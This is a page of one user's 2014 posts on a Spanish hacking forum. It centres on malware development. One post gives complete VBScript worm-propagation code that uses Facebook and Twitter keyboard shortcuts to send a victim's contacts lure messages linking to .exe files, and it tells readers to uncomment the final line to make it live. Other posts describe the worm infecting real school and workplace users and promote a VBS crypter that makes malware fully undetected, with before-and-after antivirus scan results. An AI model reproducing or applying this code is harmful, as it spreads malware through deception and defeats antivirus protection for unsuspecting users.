elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 [29] 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ... 102
281  Seguridad Informática / Análisis y Diseño de Malware / Re: Cactus VBS Crypter 1.0 en: 11 Marzo 2014, 09:53 am
Al parecer era producto de que no podia escribir en el escritorio, asi que lo probe desde la raiz de D:\ y me funciono a la casi-perfeccion, pues el AV me elimina el vbs generado al segundo de creado. Esta en version 1.0 asi que esas cosas pasan, espero que lo puedas solucionar pronto, mientras sigo trabajando con el mio.


Gracias por el feedback, pero necesito un poco más de información:

1- El script original que quieres cifrar
2- El AV que tienes instalado en ese PC

En breve publicaré la versión 2.0 para que puedas probar otros metodos de cifrado. Saludos y gracias :)
282  Seguridad Informática / Análisis y Diseño de Malware / MOVIDO: [AYUDA][VBS] Pasar varios argumentos en un acceso directo en: 11 Marzo 2014, 09:51 am
El tema ha sido movido a Scripting.

http://foro.elhacker.net/index.php?topic=410344.0
283  Programación / Scripting / Re: [AYUDA][VBS] Pasar varios argumentos en un acceso directo en: 11 Marzo 2014, 09:51 am
Te lo muevo al foro de scripting.

Ahí te podrán ayudar mucho mejor. Elektro es un dios de los scripts xD
284  Seguridad Informática / Análisis y Diseño de Malware / Re: Cactus VBS Crypter 1.0 en: 10 Marzo 2014, 00:03 am
Preciosa interfaz, buena selección musical y gracias por la mención en el about :P

Respecto a la funcionalidad no lo he probado pero viendo los resultados debe ir genial :D

Gracias :D Ya sabes que me gusta mucho esmerarme en la GUI de cualquier proyecto. Esta versión 1.0 es muy limitada, pero necesitaba sacar el proyecto al público antes que otro se me adelantase. La proxima versión 2.0 (aún en desarrollo) luce tal que así:



PD: Ya veo que te has visto en el about :P
285  Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] Facebook y Twitter Spread en: 8 Marzo 2014, 16:35 pm
HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!

El codigo es sencillo y "chapucero", evidentemente se puede implementar de formas más eficaces, ésto es solo una prueba de concepto. Yo le agregaría una función que compruebe las cookies locales para ver si el usuario está logeado en Facebook/Twitter y luego una función que detecte si el usuario está delante de la pantalla o no, por ejemplo comprobando la posición del Mouse a intervalos de 5 minutos, si el mouse no se mueve pues lanzar el spread para que nadie lo vea.

Insisto que lo he probado con varios usuarios del instituo y del trabajo. El gusano se expandió por la red en cuestión de horas. Tuve que eliminar el fichero de descarga para detener la infección.

Es un método un poco brusco y "chapucero", pero funciona que da miedo :D
286  Seguridad Informática / Análisis y Diseño de Malware / Re: [VBS] [SOURCE] Facebook y Twitter Spread en: 5 Marzo 2014, 00:36 am
Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos

Lo has probado? Te ha funcionado? Mañana lo probaré en otras maquinas con SO y web-browsers diferentes a ver si detecto algun bug.

Gracias! :D

PD: vbs tiene la facilidad de ser fácilmente programable y encriptable, obtienes grandes resultados con solo unos pocos bytes. Yo adoro VB6 y VBS

:D
287  Seguridad Informática / Análisis y Diseño de Malware / [VBS] [SOURCE] Facebook y Twitter Spread en: 4 Marzo 2014, 23:26 pm
Hola a todos

Como algunos ya habréis visto, estoy retomando mis tiempos mozos de programación. Ando liado desarrollando virus, troyanos y gusanos. Hoy vengo a compartir 3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")
  3.  
  4. Function FB_MSG_Spread(X)
  5. Randomize
  6. C = Chr(Int(rnd*26)+97)
  7.  
  8. WS.run "http://www.facebook.com"
  9. WScript.Sleep 5000
  10.  
  11. WS.SendKeys "%m"
  12. WScript.Sleep 500
  13.  
  14. For i = 1 to Int(rnd*5)+2
  15. WS.SendKeys C
  16. WScript.Sleep 500
  17. WS.SendKeys "{ENTER}"
  18. Next
  19.  
  20. WScript.Sleep 500
  21. WS.SendKeys "{TAB}"
  22. WScript.Sleep 500
  23. WS.SendKeys X
  24. WScript.Sleep 500
  25. 'WS.SendKeys "{ENTER}"
  26. End Function

Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.



Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")
  3.  
  4. Function FB_TXT_Spread(X)
  5. Randomize
  6.  
  7. WS.run "http://www.facebook.com"
  8. WScript.Sleep 5000
  9.  
  10. For i = 1 to Int(rnd*5)+1
  11. WS.SendKeys "j"
  12. WScript.Sleep 800
  13. Next
  14.  
  15. WS.SendKeys "c"
  16. WScript.Sleep 800
  17. WS.SendKeys X
  18. WScript.Sleep 500
  19. 'WS.SendKeys "{ENTER}"
  20. WScript.Sleep 500
  21. WS.SendKeys "{TAB}"
  22. WScript.Sleep 500
  23. WS.SendKeys "{TAB}"
  24. WScript.Sleep 500
  25. WS.SendKeys "j"
  26. End Function

De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.



Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Código
  1. Set WS = CreateObject("WScript.Shell")
  2. call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")
  3.  
  4. Function TW_TXT_Spread(X)
  5. Randomize
  6.  
  7. WS.run "http://www.twitter.com"
  8. WScript.Sleep 6000
  9.  
  10. WS.SendKeys "n"
  11. WScript.Sleep 800
  12. WS.SendKeys X
  13. WScript.Sleep 500
  14. WS.SendKeys "{TAB}"
  15. WScript.Sleep 500
  16. 'WS.SendKeys "{ENTER}"
  17. End Function

Podéis probar el código, ya que la tecla ENTER también está comentada.





Bueno, espero que os haya gustado y que haya quedado clara mi explicación. Insisto, los script que he puesto los podéis probar en vuestro PC, ya que la línea que envía el mensaje a los contactos está deshabilitada con el comentario, así que no hay riesgo.

Saludos!! :D
288  Programación / Programación Visual Basic / Re: Que codigo es este? en: 4 Marzo 2014, 09:20 am
Basicamente es como comentan mis compañeros. Pero eso a nivel de "protección" no tiene nada.

Cualquier scriptkiddie puede sacar el password correcto o alterar el salto condicional en cuestión de segundos.

Saludos
289  Programación / Programación Visual Basic / [SOURCE] - Cactus VBS Crypter 1.0 en: 4 Marzo 2014, 00:44 am
Buenas a todos, amigos del Visua Basic jajaja

Os dejo el programa + source completo de mi última creación:



Es un encriptador para fichero VBS, en proximas versiones añadiré más algoritmos.
A destacar el trabajo de la GUI, tiene muchos efectos, particulas y musicas.

Saludos!!!

POST ORIGINAL: http://foro.elhacker.net/analisis_y_diseno_de_malware/cactus_vbs_crypter_10-t409804.0.html (el source está en el link)
290  Seguridad Informática / Análisis y Diseño de Malware / Cactus VBS Crypter 1.0 en: 4 Marzo 2014, 00:33 am
Buenas a todos

Os traigo una nueva herramienta, Cactus VBS Crypter 1.0

Es una pequeña tool (sencilla) que cifra cualquier fichero VBS para ofuscar su código y evitar la detección por firmas de los AntiVirus. Permite dejar un fichero completamente FUD (Full Undetected).


El funcionamiento es muy sencillo, seleccionamos un fichero VBS, la cifrado deseada y pulsamos el botón "Encrypt VBS".

Por el momento, en ésta versión 1.0 solo he implementado un Engine para cifrar. En próximas versiones añadiré los algoritmos que faltan. Cada fichero cifrado con SAE es generado utilizando una semilla aleatoria de 0 hasta 10, por lo que un mismo fichero puede ser cifrado de 10 formas diferentes. Además con las opciones avanzadas podrás utilizar variables aleatorias para burlar la heurística de los AV.

Como todos mis proyectos, Cactus VBS Crypter es gratis y OpenSource.

Está programado 100% usando VisualBasic 6.0
Los efectos de la GUI también son programados en VB.

Os dejo un ejemplo de h-worm antes y después de ser cifrado:

               Filename :h-worm sample.vbs
               Type : File
               Filesize : 14266 bytes
               Date : 04/03/2014 - 00:16 GMT+2
               MD5 : c967656a556acb11b84ab5e747174b8f
               SHA1 : bd068ef682f12ca08305b5a6fd1e6d04584afea5
               Status : Infected
               Result :25/35
               
                  AVG Free - Virus found VBS/Downloader.Agent
                  ArcaVir - Heur.VBS.Generic.23
                  Avast - VBS:Agent-AOZ [Trj]
                  AntiVir (Avira) - VBSOKgent.BH.3
                  BitDefender - Worm.VBS.Dunihi.BC
                  VirusBuster Internet Security - HTML.Psyme.Gen
                  Clam Antivirus - OK
                  COMODO Internet Security - OK
                  Dr.Web - Trojan.Hworm.1
                  eTrust-Vet - VBS/Jenxcus.A
                  F-PROT Antivirus - VBS/Dunihi.A (exact)
                  F-Secure Internet Security - OK
                  G Data - Worm.VBS.Dunihi.BC, VBS:Dropper-DK [Trj]
                  IKARUS Security - Virus.VBS.Downloader
                  Kaspersky Antivirus - Worm.VBS.Dinihou.a
                  McAfee - VBSOKutorun.worm.aapj
                  MS Security Essentials - Worm:VBS/Jenxcus.K
                  ESET NOD32 - Worm.VBSOKgent.NDH
                  Norman - text/Dunihi.B
                  Norton Antivirus - OK
                  Panda Security - OK
                  A-Squared - Worm.VBS.Dunihi.BC (B)
                  Quick Heal Antivirus - VBS/HBraker.NO
                  Solo Antivirus - OK
                  Sophos - VBS/Dinihou-G
                  Trend Micro Internet Security - VBS_DUNIHI.SM2
                  VBA32 Antivirus - OK
                  Zoner AntiVirus - OK
                  Ad-Aware - Worm.VBS.Jenxcus.ah (v)
                  BullGuard - Worm.VBS.Dunihi.BC
                  Immunet Antivirus - OK
                  K7 Ultimate - NetWorm ( 0040f5f81 )
                  NANO Antivirus - Trojan.Script.Hworm.cbxvbd, Trojan.Script.Agent.chhpqc, Trojan.Script.Qhost.chhpdx
                  Panda CommandLine - OK
                  VIPRE - Worm.VBS.Jenxcus.ah (v)



               Filename : 7871_SAE.vbs
               Type : File
               Filesize : 47171 bytes
               Date : 04/03/2014 - 00:20 GMT+2
               MD5 : 387ae20ac7f3930ca8d866ea5e3b77d5
               SHA1 : ae47567be4de52035987ca3d76034b0cba369be5
               Status : Clean
               Result :0/35
               
                  AVG Free - OK
                  ArcaVir - OK
                  Avast - OK
                  AntiVir (Avira) - OK
                  BitDefender - OK
                  VirusBuster Internet Security - OK
                  Clam Antivirus - OK
                  COMODO Internet Security - OK
                  Dr.Web - OK
                  eTrust-Vet - OK
                  F-PROT Antivirus - OK
                  F-Secure Internet Security - OK
                  G Data - OK
                  IKARUS Security - OK
                  Kaspersky Antivirus - OK
                  McAfee - OK
                  MS Security Essentials - OK
                  ESET NOD32 - OK
                  Norman - OK
                  Norton Antivirus - OK
                  Panda Security - OK
                  A-Squared - OK
                  Quick Heal Antivirus - OK
                  Solo Antivirus - OK
                  Sophos - OK
                  Trend Micro Internet Security - OK
                  VBA32 Antivirus - OK
                  Zoner AntiVirus - OK
                  Ad-Aware - OK
                  BullGuard - OK
                  Immunet Antivirus - OK
                  K7 Ultimate - OK
                  NANO Antivirus - OK
                  Panda CommandLine - OK
                  VIPRE - OK
            

DESCARGA: https://www.mediafire.com/?8t7ok9se572dkx7
               
PD: Me ha costado más tiempo programar la GUI y los efectos que el propio programa. jajajajaja
Páginas: 1 ... 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 [29] 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ... 102
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines